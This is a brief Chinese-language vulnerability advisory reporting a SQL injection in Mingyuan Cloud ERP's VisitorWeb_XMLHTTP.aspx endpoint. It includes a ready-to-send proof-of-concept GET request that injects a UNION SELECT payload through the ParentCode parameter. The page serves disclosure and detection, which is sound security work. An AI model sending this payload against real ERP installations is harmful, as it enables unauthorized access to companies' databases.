明源云ERP VisitorWeb_XMLHTTP.aspx SQL注入漏洞

日期: 2023-08-19 | 影响软件: 明源云ERP | POC: 已公开

漏洞描述

明源云ERP是一款由明源云科技有限公司开发的企业管理软件。明源云ERP产品旨在帮助企业实现数字化、智能化的管理,提高企业运营效率和核心竞争力。其中 VisitorWeb_XMLHTTP.aspx 路径存在SQL注入漏洞。

PoC代码

GET /CgZtbWeb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ywtype=GetParentProjectName&ParentCode=1'+union+select+sum(3233*3323)--+z HTTP/1.1
Host:

相关漏洞推荐